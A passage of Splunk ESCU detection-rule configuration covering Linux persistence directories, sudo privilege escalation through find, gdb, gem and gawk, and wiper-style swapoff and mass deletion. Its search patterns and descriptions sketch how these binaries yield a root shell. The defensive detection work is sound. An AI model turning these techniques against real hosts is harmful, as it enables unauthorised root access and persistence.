Kernel Driver Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Rootkit"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.006", "T1547"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0
realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/kernel/drivers/*") by Filesystem.dest Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_file_created_in_kernel_driver_directory_filter` [ESCU - Linux File Creation In Init Boot Directory - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious file creation in init system directories, which are used to execute a script or binary automatically at boot. This technique is commonly abused by adversaries, malware authors and red teamers to persist on a targeted or compromised host. The same behavior can be produced by an administrator or network operator adding script or binary files as part of a task or automation, so filtering is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1037.004", "T1037"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious file creation in init system directories, which are used to execute a script or binary automatically at boot. This technique is commonly abused by adversaries, malware authors and red teamers to persist on a targeted or compromised host. The same behavior can be produced by an administrator or network operator adding script or binary files as part of a task or automation, so filtering is needed. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints.
If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrators or network operators can create files in these folders for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-20 action.escu.modification_date = 2021-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux File Creation In Init Boot Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux File Creation In Init Boot Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1037.004", "T1037"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN
("*/etc/init.d/*", "*/etc/rc.d/*", "*/sbin/init.d/*", "*/etc/rc.local*") by Filesystem.dest Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_file_creation_in_init_boot_directory_filter` [ESCU - Linux File Creation In Profile Directory - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious file creation in the /etc/profile.d directory, whose scripts are sourced by the shell each time a user starts a login shell on a Linux machine. This technique is commonly abused by adversaries, malware and red teamers as a persistence mechanism on the targeted or compromised host. This anomaly detection is a good indicator that someone wants code to run at every login, which can also be done by an administrator or network operator for automation purposes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.004", "T1546"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious file creation in the /etc/profile.d directory, whose scripts are sourced by the shell each time a user starts a login shell on a Linux machine. This technique is commonly abused by adversaries, malware and red teamers as a persistence mechanism on the targeted or compromised host. This anomaly detection is a good indicator that someone wants code to run at every login, which can also be done by an administrator or network operator for automation purposes. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrators or network operators can create files in the profile.d folder for automation purposes.
Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-20 action.escu.modification_date = 2021-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux File Creation In Profile Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux File Creation In Profile Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.004", "T1546"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/etc/profile.d/*") by Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | 
`security_content_ctime(firstTime)` | `linux_file_creation_in_profile_directory_filter` [ESCU - Linux Find Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = Find is a command-line utility that locates files based on user-specified criteria and either prints the pathname of each matched object or, if another action is requested, performs that action on each matched object. If sudo rights are granted to the find binary for a user, that user can execute arbitrary commands as root (for example through -exec) and possibly obtain a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Find is a command-line utility that locates files based on user-specified criteria and either prints the pathname of each matched object or, if another action is requested, performs that action on each matched object. If sudo rights are granted to the find binary for a user, that user can execute arbitrary commands as root (for example through -exec) and possibly obtain a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed.
action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Find Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 5}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 5}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Find Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*find*" AND Processes.process="*-exec*" AND Processes.process="*sudo*" by Processes.dest Processes.user 
Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_find_privilege_escalation_filter` [ESCU - Linux GDB Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = GDB is the GNU Debugger, a tool for debugging programs written in C, C++, Ada, Fortran and other languages. Its console is opened with the gdb command in a terminal. If sudo rights are granted to the gdb binary for a user, that user can execute arbitrary commands as root (for example through a shell-escape -ex command) and possibly obtain a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = GDB is the GNU Debugger, a tool for debugging programs written in C, C++, Ada, Fortran and other languages. Its console is opened with the gdb command in a terminal. If sudo rights are granted to the gdb binary for a user, that user can execute arbitrary commands as root (for example through a shell-escape -ex command) and possibly obtain a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux GDB Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux GDB Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*gdb*" AND 
Processes.process="*-nx*" AND Processes.process="*-ex*!*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_gdb_privilege_escalation_filter` [ESCU - Linux Gem Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = RubyGems is a package manager for the Ruby programming language that provides a standard format for distributing Ruby programs and libraries (in a self-contained format called a "gem"), a tool designed to easily manage the installation of gems, and a server for distributing them. If sudo rights are granted to the gem binary for a user, that user can execute arbitrary commands as root (for example through the editor passed to gem open -e) and possibly obtain a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = RubyGems is a package manager for the Ruby programming language that provides a standard format for distributing Ruby programs and libraries (in a self-contained format called a "gem"), a tool designed to easily manage the installation of gems, and a server for distributing them. If sudo rights are granted to the gem binary for a user, that user can execute arbitrary commands as root (for example through the editor passed to gem open -e) and possibly obtain a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions.
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Gem Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Gem Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 
allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*gem*open*-e*" AND Processes.process="*-c*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_gem_privilege_escalation_filter` [ESCU - Linux GNU Awk Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = gawk is the GNU implementation of awk, a pattern scanning and processing language. The awk command requires no compiling and allows the user to use variables, numeric functions, string functions, and logical operators. It is a utility that enables programmers to write small, effective programs as statements that define the text patterns to search for in a document and the action to take when a match is found within a line. If sudo rights are granted to the gawk binary for a user, that user can execute arbitrary commands as root (for example through a BEGIN block calling system()) and possibly obtain a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = gawk is the GNU implementation of awk, a pattern scanning and processing language. The awk command requires no compiling and allows the user to use variables, numeric functions, string functions, and logical operators.
It is a utility that enables programmers to write small, effective programs as statements that define the text patterns to search for in a document and the action to take when a match is found within a line. If sudo rights are granted to the gawk binary for a user, that user can execute arbitrary commands as root (for example through a BEGIN block calling system()) and possibly obtain a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed.
action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux GNU Awk Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux GNU Awk Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*gawk*" AND Processes.process="*BEGIN*{system*" AND Processes.process="*sudo*" by Processes.dest 
Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_gnu_awk_privilege_escalation_filter` [ESCU - Linux Hardware Addition SwapOff - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for execution of swapoff to disable swapping on paging devices. This technique was seen in the AwfulShred malware, which disables swapping on the specified devices and files. This anomaly detection can be a good indicator that a process or a user is trying to disable this Linux feature on a targeted host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1200"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for execution of swapoff to disable swapping on paging devices. This technique was seen in the AwfulShred malware, which disables swapping on the specified devices and files. This anomaly detection can be a good indicator that a process or a user is trying to disable this Linux feature on a targeted host. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = administrator may disable swapping of devices in a linux host. Filter is needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Hardware Addition SwapOff - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = a $process_name$ swap off paging device in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Hardware Addition SwapOff - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1200"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "swapoff" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | 
`drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_hardware_addition_swapoff_filter` [ESCU - Linux High Frequency Of File Deletion In Boot Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a high frequency of file deletion relative to process name and process id /boot/ folder. These events was seen in industroyer2 wiper malware where it tries to delete all files in a critical directory in linux directory. This detection already contains some filter that might cause false positive during our testing. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a high frequency of file deletion relative to process name and process id /boot/ folder. These events was seen in industroyer2 wiper malware where it tries to delete all files in a critical directory in linux directory. This detection already contains some filter that might cause false positive during our testing. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = linux package installer/uninstaller may cause this event. Please update you filter macro to remove false positives. 
action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux High Frequency Of File Deletion In Boot Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Industroyer2"] action.risk = 1 action.risk.param._risk_message = Multiple files detection in /boot/ folder on $dest$ by process GUID - $process_guid$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux High Frequency Of File Deletion In Boot Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a high frequency of file deletion relative to process name and process id /boot/ folder. These events was seen in industroyer2 wiper malware where it tries to delete all files in a critical directory in linux directory. This detection already contains some filter that might cause false positive during our testing. 
action.notable.param.rule_title = Linux High Frequency Of File Deletion In Boot Folder action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Filesystem.file_name) as deletedFileNames values(Filesystem.file_path) as deletedFilePath dc(Filesystem.file_path) as numOfDelFilePath count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted Filesystem.file_path = "/boot/*" by _time span=1h Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | where numOfDelFilePath >= 200 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_high_frequency_of_file_deletion_in_boot_folder_filter` [ESCU - Linux High Frequency Of File Deletion In Etc Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a high frequency of file deletion relative to process name and process id /etc/ folder. These events was seen in acidrain wiper malware where it tries to delete all files in a non-standard directory in linux directory. This detection already contains some filter that might cause false positive during our testing. But we recommend to add more filter if needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a high frequency of file deletion relative to process name and process id /etc/ folder. These events was seen in acidrain wiper malware where it tries to delete all files in a non-standard directory in linux directory. 
This detection already contains some filter that might cause false positive during our testing. But we recommend to add more filter if needed. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = linux package installer/uninstaller may cause this event. Please update you filter macro to remove false positives. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux High Frequency Of File Deletion In Etc Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AcidRain", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Multiple files delted in /etc/ folder on $dest$ by process GUID - $process_guid$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux High Frequency Of File Deletion In Etc Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["AcidRain", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew 
= 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Filesystem.file_name) as deletedFileNames values(Filesystem.file_path) as deletedFilePath dc(Filesystem.file_path) as numOfDelFilePath count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted Filesystem.file_path = "/etc/*" by _time span=1h Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | where numOfDelFilePath >= 200 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_high_frequency_of_file_deletion_in_etc_folder_filter` [ESCU - Linux Impair Defenses Process Kill - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for PKILL process execution for possible termination of process. This technique is being used by several Threat actors, adversaries and red teamers to terminate processes in a targeted linux machine. This Hunting detection can be a good pivot to check a possible defense evasion technique or termination of security application in a linux host or wiper like Awfulshred that corrupt all files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for PKILL process execution for possible termination of process. This technique is being used by several Threat actors, adversaries and red teamers to terminate processes in a targeted linux machine. This Hunting detection can be a good pivot to check a possible defense evasion technique or termination of security application in a linux host or wiper like Awfulshred that corrupt all files. 
